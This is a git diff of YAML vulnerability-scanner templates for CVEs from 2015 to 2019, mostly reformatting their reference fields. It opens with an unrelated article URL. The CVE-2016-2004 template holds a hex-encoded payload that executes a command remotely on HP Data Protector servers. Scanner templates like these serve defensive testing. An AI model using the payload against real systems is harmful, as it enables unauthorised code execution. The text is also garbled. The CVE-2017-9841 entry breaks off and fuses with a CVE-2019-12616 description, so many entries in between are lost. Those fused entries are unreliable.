https://www.c2.lol/articles/xss-in-fortigates-ssl-vpn-login-page tags: cve,cve2015,xss,fortigates,ssl diff --git a/cves/2015/CVE-2015-2080.yaml b/cves/2015/CVE-2015-2080.yaml index 49fa9754af..3e5bfd8e40 100644 --- a/cves/2015/CVE-2015-2080.yaml +++ b/cves/2015/CVE-2015-2080.yaml @@ -4,7 +4,7 @@ info: name: Eclipse Jetty Remote Leakage author: pikpikcu severity: medium - reference: | + reference: - https://github.com/eclipse/jetty.project/blob/jetty-9.2.x/advisories/2015-02-24-httpparser-error-buffer-bleed.md - https://blog.gdssecurity.com/labs/2015/2/25/jetleak-vulnerability-remote-leakage-of-shared-buffers-in-je.html - http://packetstormsecurity.com/files/130567/Jetty-9.2.8-Shared-Buffer-Leakage.html diff --git a/cves/2015/CVE-2015-3648.yaml b/cves/2015/CVE-2015-3648.yaml index d2fd7042cb..672f04a518 100644 --- a/cves/2015/CVE-2015-3648.yaml +++ b/cves/2015/CVE-2015-3648.yaml @@ -5,7 +5,7 @@ info: author: pikpikcu severity: high description: ResourceSpace is prone to a local file-include vulnerability because it fails to sufficiently sanitize user-supplied input. - reference: | + reference: - https://vulners.com/cve/CVE-2015-3648/ - https://www.securityfocus.com/bid/75019 tags: cve,cve2015,lfi,resourcespace diff --git a/cves/2015/CVE-2015-7823.yaml b/cves/2015/CVE-2015-7823.yaml index c5329e007f..4fe2a7a788 100644 --- a/cves/2015/CVE-2015-7823.yaml +++ b/cves/2015/CVE-2015-7823.yaml @@ -4,7 +4,7 @@ info: name: Kentico CMS 8.2 Open Redirection author: 0x_Akoko description: The GetDocLink.ashx with link variable is vulnerable to open redirect vulnerability - reference: | + reference: - https://packetstormsecurity.com/files/133981/Kentico-CMS-8.2-Cross-Site-Scripting-Open-Redirect.html - https://nvd.nist.gov/vuln/detail/CVE-2015-7823 severity: low diff --git a/cves/2015/CVE-2015-9480.yaml b/cves/2015/CVE-2015-9480.yaml index 50e1fb1f8c..bcd3d48d4d 100644 --- a/cves/2015/CVE-2015-9480.yaml +++ b/cves/2015/CVE-2015-9480.yaml @@ -4,7 +4,7 @@ info: name: WordPress Plugin RobotCPA 5 - Directory Traversal author: daffainfo severity: high - reference: | + reference: - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-9480 - https://www.exploit-db.com/exploits/37252 tags: cve,cve2015,wordpress,wp-plugin,lfi diff --git a/cves/2016/CVE-2016-10960.yaml b/cves/2016/CVE-2016-10960.yaml index 68f7e2616c..9f3466faaa 100644 --- a/cves/2016/CVE-2016-10960.yaml +++ b/cves/2016/CVE-2016-10960.yaml @@ -5,7 +5,7 @@ info: author: daffainfo severity: critical description: The wsecure plugin before 2.4 for WordPress has remote code execution via shell metacharacters in the wsecure-config.php publish parameter. - reference: | + reference: - https://www.pluginvulnerabilities.com/2016/07/12/remote-code-execution-rce-vulnerability-in-wsecure-lite/ - https://www.acunetix.com/vulnerabilities/web/wordpress-plugin-wsecure-lite-remote-code-execution-2-3/ - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-10960 diff --git a/cves/2016/CVE-2016-2004.yaml b/cves/2016/CVE-2016-2004.yaml index 9a6d2ecfb0..49679ca46d 100644 --- a/cves/2016/CVE-2016-2004.yaml +++ b/cves/2016/CVE-2016-2004.yaml @@ -1,26 +1,26 @@ -id: CVE-2016-2004 - -info: - name: HP Data Protector A.09.00 - Arbitrary Command Execution - author: pussycat0x - severity: critical - tags: cve,cve2016,network,iot,hp,rce - description: HPE Data Protector before 7.03_108, 8.x before 8.15, and 9.x before 9.06 allow remote attackers to execute arbitrary code via unspecified vectors related to lack of authentication. This vulnerability exists because of an incomplete fix for CVE-2014-2623. - reference: | - - https://www.exploit-db.com/exploits/39858 - - https://nvd.nist.gov/vuln/detail/CVE-2016-2004 - -network: - - inputs: - - data: "00000034320001010101010100010001000100010100203238005c7065726c2e65786500202d6573797374656d282777686f616d69272900" # whoami - type: hex - - host: - - "{{Hostname}}" - - "{{Hostname}}:5555" - - matchers: - - type: word - encoding: hex - words: - - "00000034fffe3900000020006e007400200061007500740068006f0072006900740079005c00730079007300740065006d000a0000000000" # authority\system +id: CVE-2016-2004 + +info: + name: HP Data Protector A.09.00 - Arbitrary Command Execution + author: pussycat0x + severity: critical + tags: cve,cve2016,network,iot,hp,rce + description: HPE Data Protector before 7.03_108, 8.x before 8.15, and 9.x before 9.06 allow remote attackers to execute arbitrary code via unspecified vectors related to lack of authentication. This vulnerability exists because of an incomplete fix for CVE-2014-2623. + reference: + - https://www.exploit-db.com/exploits/39858 + - https://nvd.nist.gov/vuln/detail/CVE-2016-2004 + +network: + - inputs: + - data: "00000034320001010101010100010001000100010100203238005c7065726c2e65786500202d6573797374656d282777686f616d69272900" # whoami + type: hex + + host: + - "{{Hostname}}" + - "{{Hostname}}:5555" + + matchers: + - type: word + encoding: hex + words: + - "00000034fffe3900000020006e007400200061007500740068006f0072006900740079005c00730079007300740065006d000a0000000000" # authority\system diff --git a/cves/2016/CVE-2016-3081.yaml b/cves/2016/CVE-2016-3081.yaml index 420fa7a5d4..05119f088c 100644 --- a/cves/2016/CVE-2016-3081.yaml +++ b/cves/2016/CVE-2016-3081.yaml @@ -6,7 +6,7 @@ info: severity: high description: | Apache Struts 2.3.19 to 2.3.20.2, 2.3.21 to 2.3.24.1, and 2.3.25 to 2.3.28, when Dynamic Method Invocation is enabled, allow remote attackers to execute arbitrary code via method: prefix, related to chained expressions. - reference: | + reference: - https://cwiki.apache.org/confluence/display/WW/S2-032 - https://struts.apache.org/docs/s2-032.html tags: cve,cve2016,struts,rce,apache diff --git a/cves/2017/CVE-2017-1000486.yaml b/cves/2017/CVE-2017-1000486.yaml index 2f2eca9302..3f8ce3acd8 100644 --- a/cves/2017/CVE-2017-1000486.yaml +++ b/cves/2017/CVE-2017-1000486.yaml @@ -5,7 +5,7 @@ info: author: Moritz Nentwig severity: critical description: Primetek Primefaces 5.x is vulnerable to a weak encryption flaw resulting in remote code execution - reference: | + reference: - https://github.com/mogwailabs/CVE-2017-1000486 - https://github.com/pimps/CVE-2017-1000486 - https://blog.mindedsecurity.com/2016/02/rce-in-oracle-netbeans-opensource.html diff --git a/cves/2017/CVE-2017-12149.yaml b/cves/2017/CVE-2017-12149.yaml index dbce8a980b..edaaad11a4 100755 --- a/cves/2017/CVE-2017-12149.yaml +++ b/cves/2017/CVE-2017-12149.yaml @@ -5,7 +5,7 @@ info: author: fopina severity: critical description: In Jboss Application Server as shipped with Red Hat Enterprise Application Platform 5.2, it was found that the doFilter method in the ReadOnlyAccessFilter of the HTTP Invoker does not restrict classes for which it performs deserialization and thus allowing an attacker to execute arbitrary code via crafted serialized data. - reference: | + reference: - https://nvd.nist.gov/vuln/detail/CVE-2017-12149 - https://chowdera.com/2020/12/20201229190934023w.html - https://github.com/vulhub/vulhub/tree/master/jboss/CVE-2017-12149 diff --git a/cves/2017/CVE-2017-12542.yaml b/cves/2017/CVE-2017-12542.yaml index d7570e902e..24936c9c92 100644 --- a/cves/2017/CVE-2017-12542.yaml +++ b/cves/2017/CVE-2017-12542.yaml @@ -5,7 +5,7 @@ info: author: pikpikcu severity: critical description: A authentication bypass and execution of code vulnerability in HPE Integrated Lights-out 4 (iLO 4) version prior to 2.53 was found. - reference: | + reference: - https://nvd.nist.gov/vuln/detail/CVE-2017-12542 - https://www.exploit-db.com/exploits/44005 tags: cve,cve2017,ilo4,hpe diff --git a/cves/2017/CVE-2017-12629.yaml b/cves/2017/CVE-2017-12629.yaml index 30abb5da9a..b45ec2ee75 100644 --- a/cves/2017/CVE-2017-12629.yaml +++ b/cves/2017/CVE-2017-12629.yaml @@ -5,7 +5,7 @@ info: author: dwisiswant0 severity: critical tags: cve,cve2017,solr,apache,rce,ssrf,oob - reference: | + reference: - https://nvd.nist.gov/vuln/detail/CVE-2017-12629 - https://twitter.com/honoki/status/1298636315613974532/photo/1 diff --git a/cves/2017/CVE-2017-12637.yaml b/cves/2017/CVE-2017-12637.yaml index d66e9f42ed..a2b0c6451a 100644 --- a/cves/2017/CVE-2017-12637.yaml +++ b/cves/2017/CVE-2017-12637.yaml @@ -6,7 +6,7 @@ info: severity: high description: Directory traversal vulnerability in scheduler/ui/js/ffffffffbca41eb4/UIUtilJavaScriptJS in SAP NetWeaver Application Server Java 7.5 allows remote attackers to read arbitrary files via a .. (dot dot) in the query string, as exploited in the wild in August 2017, aka SAP Security Note 2486657. tags: cve,cve2017,sap,lfi - reference: | + reference: - https://www.cvedetails.com/cve/CVE-2017-12637/ - https://nvd.nist.gov/vuln/detail/CVE-2017-12637 - https://download.ernw-insight.de/troopers/tr18/slides/TR18_SAP_SAP-Bugs-The-Phantom-Security.pdf diff --git a/cves/2017/CVE-2017-12794.yaml b/cves/2017/CVE-2017-12794.yaml index 08821c1780..56d43089ee 100644 --- a/cves/2017/CVE-2017-12794.yaml +++ b/cves/2017/CVE-2017-12794.yaml @@ -4,7 +4,7 @@ info: name: Django debug page XSS author: pikpikcu severity: medium - reference: | + reference: - https://twitter.com/sec715/status/1406779605055270914 - https://nvd.nist.gov/vuln/detail/CVE-2017-12794 description: | diff --git a/cves/2017/CVE-2017-14535.yaml b/cves/2017/CVE-2017-14535.yaml index c4e46b6c4c..9b73a32f7b 100644 --- a/cves/2017/CVE-2017-14535.yaml +++ b/cves/2017/CVE-2017-14535.yaml @@ -4,7 +4,7 @@ info: name: Trixbox - 2.8.0.4 OS Command Injection Vulnerability author: pikpikcu severity: high - reference: | + reference: - https://secur1tyadvisory.wordpress.com/2018/02/11/trixbox-os-command-injection-vulnerability-cve-2017-14535/ - https://www.exploit-db.com/exploits/49913 tags: cve,cve2017,trixbox,rce diff --git a/cves/2017/CVE-2017-14537.yaml b/cves/2017/CVE-2017-14537.yaml index 784f327ae2..bcfd8edfaf 100644 --- a/cves/2017/CVE-2017-14537.yaml +++ b/cves/2017/CVE-2017-14537.yaml @@ -6,7 +6,7 @@ info: severity: medium tags: cve,cve2017,trixbox,lfi description: trixbox 2.8.0.4 has path traversal via the xajaxargs array parameter to /maint/index.php?packages or the lang parameter to /maint/modules/home/index.php. - reference: | + reference: - https://nvd.nist.gov/vuln/detail/CVE-2017-14537 - https://secur1tyadvisory.wordpress.com/2018/02/13/trixbox-multiple-path-traversal-vulnerabilities-cve-2017-14537/ - Product vendor:-https://sourceforge.net/projects/asteriskathome/ diff --git a/cves/2017/CVE-2017-15647.yaml b/cves/2017/CVE-2017-15647.yaml index 263e4b2bf9..5102cbacf4 100644 --- a/cves/2017/CVE-2017-15647.yaml +++ b/cves/2017/CVE-2017-15647.yaml @@ -5,7 +5,7 @@ info: author: daffainfo severity: medium description: On FiberHome routers, Directory Traversal exists in /cgi-bin/webproc via the getpage parameter in conjunction with a crafted var:page value. - reference: | + reference: - https://www.exploit-db.com/exploits/44054 - https://www.cvedetails.com/cve/CVE-2017-15647 tags: cve,cve2017,lfi,router diff --git a/cves/2017/CVE-2017-15944.yaml b/cves/2017/CVE-2017-15944.yaml index 2d6bd7fbd0..9cb67b8924 100644 --- a/cves/2017/CVE-2017-15944.yaml +++ b/cves/2017/CVE-2017-15944.yaml @@ -3,7 +3,7 @@ id: CVE-2017-15944 info: name: PreAuth RCE on Palo Alto GlobalProtect author: emadshanab,milo2012 - reference: | + reference: - https://www.exploit-db.com/exploits/43342 - http://blog.orange.tw/2019/07/attacking-ssl-vpn-part-1-preauth-rce-on-palo-alto.html severity: high diff --git a/cves/2017/CVE-2017-17059.yaml b/cves/2017/CVE-2017-17059.yaml index 9bc3b473c3..10ad0d299d 100644 --- a/cves/2017/CVE-2017-17059.yaml +++ b/cves/2017/CVE-2017-17059.yaml @@ -5,7 +5,7 @@ info: author: daffainfo severity: medium description: XSS exists in the amtyThumb amty-thumb-recent-post (aka amtyThumb posts or wp-thumb-post) plugin 8.1.3 for WordPress via the query string to amtyThumbPostsAdminPg.php. - reference: | + reference: - https://github.com/NaturalIntelligence/wp-thumb-post/issues/1 - https://nvd.nist.gov/vuln/detail/CVE-2017-17059 tags: cve,cve2017,wordpress,xss,wp-plugin diff --git a/cves/2017/CVE-2017-17562.yaml b/cves/2017/CVE-2017-17562.yaml index 5d46e8977b..100b6d29f9 100644 --- a/cves/2017/CVE-2017-17562.yaml +++ b/cves/2017/CVE-2017-17562.yaml @@ -4,7 +4,7 @@ info: name: Embedthis GoAhead RCE description: Embedthis GoAhead before 3.6.5 allows remote code execution if CGI is enabled and a CGI program is dynamically linked. author: geeknik - reference: | + reference: - https://www.elttam.com/blog/goahead/ - https://github.com/ivanitlearning/CVE-2017-17562 - https://github.com/vulhub/vulhub/tree/master/goahead/CVE-2017-17562 diff --git a/cves/2017/CVE-2017-3506.yaml b/cves/2017/CVE-2017-3506.yaml index b177e57c20..1a84749dbd 100644 --- a/cves/2017/CVE-2017-3506.yaml +++ b/cves/2017/CVE-2017-3506.yaml @@ -6,7 +6,7 @@ info: description: Vulnerability in the Oracle WebLogic Server component of Oracle Fusion Middleware (Web Services). Supported versions that are affected are 10.3.6.0, 12.1.3.0, 12.2.1.0, 12.2.1.1 and 12.2.1.2. Difficult to exploit vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle WebLogic Server. severity: high tags: cve,cve2017,weblogic,oracle,rce,oob - reference: | + reference: - https://hackerone.com/reports/810778 - https://nvd.nist.gov/vuln/detail/CVE-2017-3506 diff --git a/cves/2017/CVE-2017-3528.yaml b/cves/2017/CVE-2017-3528.yaml index f37b6660e4..2a44a34b56 100644 --- a/cves/2017/CVE-2017-3528.yaml +++ b/cves/2017/CVE-2017-3528.yaml @@ -4,7 +4,7 @@ info: name: Oracle E-Business Suite 12.1.3/12.2.x - Open Redirect author: 0x_Akoko severity: low - reference: | + reference: - https://blog.zsec.uk/cve-2017-3528/ - https://www.exploit-db.com/exploits/43592 tags: oracle,redirect diff --git a/cves/2017/CVE-2017-3881.yaml b/cves/2017/CVE-2017-3881.yaml index 22ddec3fb6..3e200f2bf4 100644 --- a/cves/2017/CVE-2017-3881.yaml +++ b/cves/2017/CVE-2017-3881.yaml @@ -4,7 +4,7 @@ info: name: Cisco IOS 12.2(55)SE11 Remote Code Execution author: dwisiswant0 severity: critical - reference: | + reference: - https://github.com/artkond/cisco-rce - https://artkond.com/2017/04/10/cisco-catalyst-remote-code-execution/ - https://github.com/rapid7/metasploit-framework/blob/master/documentation/modules/auxiliary/dos/cisco/ios_telnet_rocem.md diff --git a/cves/2017/CVE-2017-5487.yaml b/cves/2017/CVE-2017-5487.yaml index 866847913c..2c0d7e9c1a 100644 --- a/cves/2017/CVE-2017-5487.yaml +++ b/cves/2017/CVE-2017-5487.yaml @@ -6,7 +6,7 @@ info: severity: info description: wp-includes/rest-api/endpoints/class-wp-rest-users-controller.php in the REST API implementation in WordPress 4.7 before 4.7.1 does not properly restrict listings of post authors, which allows remote attackers to obtain sensitive information via a wp-json/wp/v2/users request. tags: cve,cve2017,wordpress - reference: | + reference: - https://nvd.nist.gov/vuln/detail/CVE-2017-5487 - https://www.exploit-db.com/exploits/41497 diff --git a/cves/2017/CVE-2017-5521.yaml b/cves/2017/CVE-2017-5521.yaml index 570847a81f..3421006395 100644 --- a/cves/2017/CVE-2017-5521.yaml +++ b/cves/2017/CVE-2017-5521.yaml @@ -4,7 +4,7 @@ info: author: princechaddha severity: medium description: An issue was discovered on NETGEAR R8500, R8300, R7000, R6400, R7300, R7100LG, R6300v2, WNDR3400v3, WNR3500Lv2, R6250, R6700, R6900, and R8000 devices.They are prone to password disclosure via simple crafted requests to the web management server. - reference: | + reference: - https://www.cvedetails.com/cve/CVE-2017-5521/ - https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/cve-2017-5521-bypassing-authentication-on-netgear-routers/ tags: cve,cve2017,auth-bypass diff --git a/cves/2017/CVE-2017-7615.yaml b/cves/2017/CVE-2017-7615.yaml index 7ff2d8bbde..de43a2eddc 100644 --- a/cves/2017/CVE-2017-7615.yaml +++ b/cves/2017/CVE-2017-7615.yaml @@ -11,8 +11,7 @@ info: # To carry out further attacks, please see reference[2] below. # This template works by guessing user ID. # MantisBT before 1.3.10, 2.2.4, and 2.3.1, that can be downloaded on reference[1]. - - reference: | + reference: - https://sourceforge.net/projects/mantisbt/files/mantis-stable/ - http://hyp3rlinx.altervista.org/advisories/MANTIS-BUG-TRACKER-PRE-AUTH-REMOTE-PASSWORD-RESET.txt - https://www.exploit-db.com/exploits/41890 diff --git a/cves/2017/CVE-2017-7921.yaml b/cves/2017/CVE-2017-7921.yaml index e0498d6b07..d3dde0e997 100644 --- a/cves/2017/CVE-2017-7921.yaml +++ b/cves/2017/CVE-2017-7921.yaml @@ -4,7 +4,7 @@ info: author: princechaddha severity: high description: An Improper Authentication issue was discovered in Hikvision DS-2CD2xx2F-I Series V5.2.0 build 140721 to V5.4.0 build 160530, DS-2CD2xx0F-I Series V5.2.0 build 140721 to V5.4.0 Build 160401, DS-2CD2xx2FWD Series V5.3.1 build 150410 to V5.4.4 Build 161125, DS-2CD4x2xFWD Series V5.2.0 build 140721 to V5.4.0 Build 160414, DS-2CD4xx5 Series V5.2.0 build 140721 to V5.4.0 Build 160421, DS-2DFx Series V5.2.0 build 140805 to V5.4.5 Build 160928, and DS-2CD63xx Series V5.0.9 build 140305 to V5.3.5 Build 160106 devices. The improper authentication vulnerability occurs when an application does not adequately or correctly authenticate users. This may allow a malicious user to escalate his or her privileges on the system and gain access to sensitive information. - reference: | + reference: - http://www.hikvision.com/us/about_10805.html - https://ics-cert.us-cert.gov/advisories/ICSA-17-124-01 tags: cve,cve2017,auth-bypass diff --git a/cves/2017/CVE-2017-9506.yaml b/cves/2017/CVE-2017-9506.yaml index 0264cbe40c..0d45c0ac48 100644 --- a/cves/2017/CVE-2017-9506.yaml +++ b/cves/2017/CVE-2017-9506.yaml @@ -5,7 +5,7 @@ info: author: pdteam severity: high description: The IconUriServlet of the Atlassian OAuth Plugin from version 1.3.0 before version 1.9.12 and from version 2.0.0 before version 2.0.4 allows remote attackers to access the content of internal network resources and/or perform an XSS attack via Server Side Request Forgery (SSRF). - reference: | + reference: - http://dontpanic.42.nl/2017/12/there-is-proxy-in-your-atlassian.html - https://ecosystem.atlassian.net/browse/OAUTH-344 - https://medium.com/bugbountywriteup/piercing-the-veil-server-side-request-forgery-to-niprnet-access-171018bca2c3 diff --git a/cves/2017/CVE-2017-9791.yaml b/cves/2017/CVE-2017-9791.yaml index a1bd926d69..0b2bfa1813 100644 --- a/cves/2017/CVE-2017-9791.yaml +++ b/cves/2017/CVE-2017-9791.yaml @@ -5,7 +5,7 @@ info: author: pikpikcu severity: critical description: The Struts 1 plugin in Apache Struts 2.1.x and 2.3.x might allow remote code execution via a malicious field value passed in a raw message to the ActionMessage. - reference: | + reference: - http://www.oracle.com/technetwork/security-advisory/alert-cve-2017-9805-3889403.html - http://struts.apache.org/docs/s2-048.html tags: cve,cve2017,apache,rce diff --git a/cves/2017/CVE-2017-9805.yaml b/cves/2017/CVE-2017-9805.yaml index 94268c3540..6ed5ae081c 100644 --- a/cves/2017/CVE-2017-9805.yaml +++ b/cves/2017/CVE-2017-9805.yaml @@ -5,7 +5,7 @@ info: author: pikpikcu severity: critical description: The REST Plugin in Apache Struts 2.1.1 through 2.3.x before 2.3.34 and 2.5.x before 2.5.13 uses an XStreamHandler with an instance of XStream for deserialization without any type filtering, which can lead to Remote Code Execution when deserializing XML payloads. - reference: | + reference: - http://www.oracle.com/technetwork/security-advisory/alert-cve-2017-9805-3889403.html - https://struts.apache.org/docs/s2-052.html tags: cve,cve2017,apache,rce,struts diff --git a/cves/2017/CVE-2017-9841.yaml b/cves/2017/CVE-2017-9841.yaml index 2a6ed3a69c..583039f7e5 100644 --- a/cves/2017/CVE-2017-9841.yaml +++ b/cves/2017/CVE-2017-9841.yaml @@ -6,7 +6,7 @@ info: severity: high description: Util/PHP/eval-stdin.php in PHPUnit before 4.8.28 and 5.x before 5.6.3 allows remote attackers to execute arbitrary PHP code via HTTP POST data beginning with a " tag pointing at the victim's phpMyAdmin database, and the attacker can potentially deliver a payload (such as a specific INSERT or DELETE statement) through the victim. severity: medium tags: cve,cve2019,phpmyadmin,csrf - reference: | + reference: - https://www.phpmyadmin.net/security/PMASA-2019-4/ - https://www.exploit-db.com/exploits/46982 - https://nvd.nist.gov/vuln/detail/CVE-2019-12616 diff --git a/cves/2019/CVE-2019-12725.yaml b/cves/2019/CVE-2019-12725.yaml index 9c6e45ad88..db7a7ffd97 100644 --- a/cves/2019/CVE-2019-12725.yaml +++ b/cves/2019/CVE-2019-12725.yaml @@ -9,7 +9,7 @@ info: found in ZeroShell 3.9.0 in the "/cgi-bin/kerbynet" url. As sudo is configured to execute /bin/tar without a password (NOPASSWD) it is possible to run root commands using the "checkpoint" tar options. - reference: | + reference: - https://www.tarlogic.com/advisories/zeroshell-rce-root.txt - https://github.com/X-C3LL/PoC-CVEs/blob/master/CVE-2019-12725/ZeroShell-RCE-EoP.py tags: cve,cve2019,rce diff --git a/cves/2019/CVE-2019-13101.yaml b/cves/2019/CVE-2019-13101.yaml index ec1c8e810a..007cdd429a 100644 --- a/cves/2019/CVE-2019-13101.yaml +++ b/cves/2019/CVE-2019-13101.yaml @@ -6,7 +6,7 @@ info: description: An issue was discovered on D-Link DIR-600M 3.02, 3.03, 3.04, and 3.06 devices. wan.htm can be accessed directly without authentication, which can lead to disclosure of information about the WAN, and can also be leveraged by an attacker to modify the data fields of the page. severity: critical tags: cve,cve2019,dlink,router,iot - reference: | + reference: - https://nvd.nist.gov/vuln/detail/CVE-2019-13101 - https://github.com/d0x0/D-Link-DIR-600M - https://www.exploit-db.com/exploits/47250 diff --git a/cves/2019/CVE-2019-14223.yaml b/cves/2019/CVE-2019-14223.yaml index a18f760750..9e75997beb 100644 --- a/cves/2019/CVE-2019-14223.yaml +++ b/cves/2019/CVE-2019-14223.yaml @@ -5,7 +5,7 @@ info: author: pdteam severity: low description: An issue was discovered in Alfresco Community Edition versions below 5.2.6, 6.0.N and 6.1.N. The Alfresco Share application is vulnerable to an Open Redirect attack via a crafted POST request. By manipulating the POST parameters, an attacker can redirect a victim to a malicious website over any protocol the attacker desires (e.g.,http, https, ftp, smb, etc.). - reference: | + reference: - https://community.alfresco.com/content?filterID=all~objecttype~thread%5Bquestions%5D - https://github.com/DrunkenShells/Disclosures/tree/master/CVE-2019-14223-Open%20Redirect%20in%20Alfresco%20Share-Alfresco%20Community tags: cve,cve2019,redirect diff --git a/cves/2019/CVE-2019-14312.yaml b/cves/2019/CVE-2019-14312.yaml index 4f414d6385..33a5873d2d 100644 --- a/cves/2019/CVE-2019-14312.yaml +++ b/cves/2019/CVE-2019-14312.yaml @@ -5,7 +5,7 @@ info: author: daffainfo severity: high description: Aptana Jaxer 1.0.3.4547 is vulnerable to a local file inclusion vulnerability in the wikilite source code viewer. This vulnerability allows a remote attacker to read internal files on the server via a tools/sourceViewer/index.html?filename=../ URI. - reference: | + reference: - https://www.exploit-db.com/exploits/47214 - https://www.cvedetails.com/cve/CVE-2019-14312 tags: cve,cve2019,lfi diff --git a/cves/2019/CVE-2019-14470.yaml b/cves/2019/CVE-2019-14470.yaml index 291551f948..05400bc1a4 100644 --- a/cves/2019/CVE-2019-14470.yaml +++ b/cves/2019/CVE-2019-14470.yaml @@ -4,7 +4,7 @@ info: name: WordPress Plugin UserPro 4.9.32 - Reflected Cross-Site Scripting (XSS) author: daffainfo severity: medium - reference: | + reference: - https://wpscan.com/vulnerability/9815 - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-14470 tags: cve,cve2019,wordpress,xss,wp-plugin diff --git a/cves/2019/CVE-2019-15043.yaml b/cves/2019/CVE-2019-15043.yaml index 50891d2037..14c565d303 100644 --- a/cves/2019/CVE-2019-15043.yaml +++ b/cves/2019/CVE-2019-15043.yaml @@ -4,7 +4,7 @@ info: name: Grafana unauthenticated API severity: medium description: In Grafana 2.x through 6.x before 6.3.4, parts of the HTTP API allow unauthenticated use. This makes it possible to run a denial of service attack against the server running Grafana. - reference: | + reference: - https://grafana.com/blog/2019/08/29/grafana-5.4.5-and-6.3.4-released-with-important-security-fix/ - https://community.grafana.com/t/grafana-5-4-5-and-6-3-4-security-update/20569 Vendor Advisory - https://community.grafana.com/t/release-notes-v6-3-x/19202 diff --git a/cves/2019/CVE-2019-15713.yaml b/cves/2019/CVE-2019-15713.yaml index ab5c7ca5fe..8c4d2b28be 100644 --- a/cves/2019/CVE-2019-15713.yaml +++ b/cves/2019/CVE-2019-15713.yaml @@ -5,7 +5,7 @@ info: author: daffainfo,dhiyaneshDk severity: medium description: Triggered via unescaped usage of URL parameters in multiple locations presented in the public view of a site. - reference: | + reference: - https://wpscan.com/vulnerability/9267 - https://nvd.nist.gov/vuln/detail/CVE-2019-15713 tags: cve,cve2019,wordpress,xss,wp-plugin diff --git a/cves/2019/CVE-2019-1653.yaml b/cves/2019/CVE-2019-1653.yaml index a7e91b721c..34e5db456d 100644 --- a/cves/2019/CVE-2019-1653.yaml +++ b/cves/2019/CVE-2019-1653.yaml @@ -6,7 +6,7 @@ info: severity: high tags: cve,cve2019,cisco description: A vulnerability in the web-based management interface of Cisco Small Business RV320 and RV325 Dual Gigabit WAN VPN Routers could allow an unauthenticated, remote attacker to retrieve sensitive information. The vulnerability is due to improper access controls for URLs. An attacker could exploit this vulnerability by connecting to an affected device via HTTP or HTTPS and requesting specific URLs. A successful exploit could allow the attacker to download the router configuration or detailed diagnostic information. Cisco has released firmware updates that address this vulnerability. - reference: | + reference: - https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190123-rv-info - https://www.exploit-db.com/exploits/46262/ - https://www.exploit-db.com/exploits/46655/ diff --git a/cves/2019/CVE-2019-17270.yaml b/cves/2019/CVE-2019-17270.yaml index accc60e1f2..3b9928363a 100644 --- a/cves/2019/CVE-2019-17270.yaml +++ b/cves/2019/CVE-2019-17270.yaml @@ -4,7 +4,7 @@ info: name: Yachtcontrol Webapplication 1.0 - Unauthenticated Rce author: pikpikcu severity: high - reference: | + reference: - https://www.exploit-db.com/exploits/47760 - https://nvd.nist.gov/vuln/detail/CVE-2019-17270 description: | diff --git a/cves/2019/CVE-2019-20085.yaml b/cves/2019/CVE-2019-20085.yaml index 1c31973d6b..eb10da34ef 100644 --- a/cves/2019/CVE-2019-20085.yaml +++ b/cves/2019/CVE-2019-20085.yaml @@ -5,7 +5,7 @@ info: author: daffainfo severity: high description: TVT NVMS-1000 devices allow GET /.. Directory Traversal - reference: | + reference: - https://nvd.nist.gov/vuln/detail/CVE-2019-20085 - https://www.exploit-db.com/exploits/48311 tags: cve,cve2019,iot,lfi diff --git a/cves/2019/CVE-2019-2616.yaml b/cves/2019/CVE-2019-2616.yaml index 5c7d640e04..03698e2cc1 100644 --- a/cves/2019/CVE-2019-2616.yaml +++ b/cves/2019/CVE-2019-2616.yaml @@ -5,7 +5,7 @@ info: author: pdteam severity: high description: Oracle Business Intelligence / XML Publisher 11.1.1.9.0 / 12.2.1.3.0 / 12.2.1.4.0 - XML External Entity Injection - reference: | + reference: - https://nvd.nist.gov/vuln/detail/CVE-2019-2616 - https://www.exploit-db.com/exploits/46729 tags: cve,cve2019,oracle,xxe,oob diff --git a/cves/2019/CVE-2019-2725.yaml b/cves/2019/CVE-2019-2725.yaml index 412c510eef..21ee150f0e 100644 --- a/cves/2019/CVE-2019-2725.yaml +++ b/cves/2019/CVE-2019-2725.yaml @@ -7,7 +7,7 @@ info: tags: cve,cve2019,oracle,weblogic,rce description: | Oracle WebLogic Server component of Oracle Fusion Middleware (subcomponent: Web Services). Supported versions that are affected are 10.3.6.0.0 and 12.1.3.0.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle WebLogic Server. Successful attacks of this vulnerability can result in takeover of Oracle WebLogic Server. - reference: | + reference: - https://paper.seebug.org/910/ - https://www.exploit-db.com/exploits/46780/ - https://www.oracle.com/security-alerts/cpujan2020.html diff --git a/cves/2019/CVE-2019-2767.yaml b/cves/2019/CVE-2019-2767.yaml index 067c443aa7..79f217f58c 100644 --- a/cves/2019/CVE-2019-2767.yaml +++ b/cves/2019/CVE-2019-2767.yaml @@ -5,7 +5,7 @@ info: author: madrobot severity: high description: Vulnerability in the BI Publisher (formerly XML Publisher) component of Oracle Fusion Middleware. The supported version that is affected are 11.1.1.9.0, 12.2.1.3.0 and 12.2.1.4.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise BI Publisher (formerly XML Publisher). - reference: | + reference: - https://nvd.nist.gov/vuln/detail/CVE-2019-2767 - https://www.exploit-db.com/exploits/46729 tags: cve,cve2019,oracle,xxe,oob diff --git a/cves/2019/CVE-2019-3799.yaml b/cves/2019/CVE-2019-3799.yaml index c750c7c3fa..8c8346a9e8 100644 --- a/cves/2019/CVE-2019-3799.yaml +++ b/cves/2019/CVE-2019-3799.yaml @@ -4,7 +4,7 @@ info: author: madrobot severity: high description: Spring Cloud Config, versions 2.1.x prior to 2.1.2, versions 2.0.x prior to 2.0.4, and versions 1.4.x prior to 1.4.6, and older unsupported versions allow applications to serve arbitrary configuration files through the spring-cloud-config-server module. A malicious user, or attacker, can send a request using a specially crafted URL that can lead a directory traversal attack. - reference: | + reference: - https://github.com/mpgn/CVE-2019-3799 - https://pivotal.io/security/cve-2019-3799 tags: cve,cve2019,lfi diff --git a/cves/2019/CVE-2019-5418.yaml b/cves/2019/CVE-2019-5418.yaml index 03d93ee30a..5639b9366a 100644 --- a/cves/2019/CVE-2019-5418.yaml +++ b/cves/2019/CVE-2019-5418.yaml @@ -5,7 +5,7 @@ info: author: omarkurt severity: medium description: There is a File Content Disclosure vulnerability in 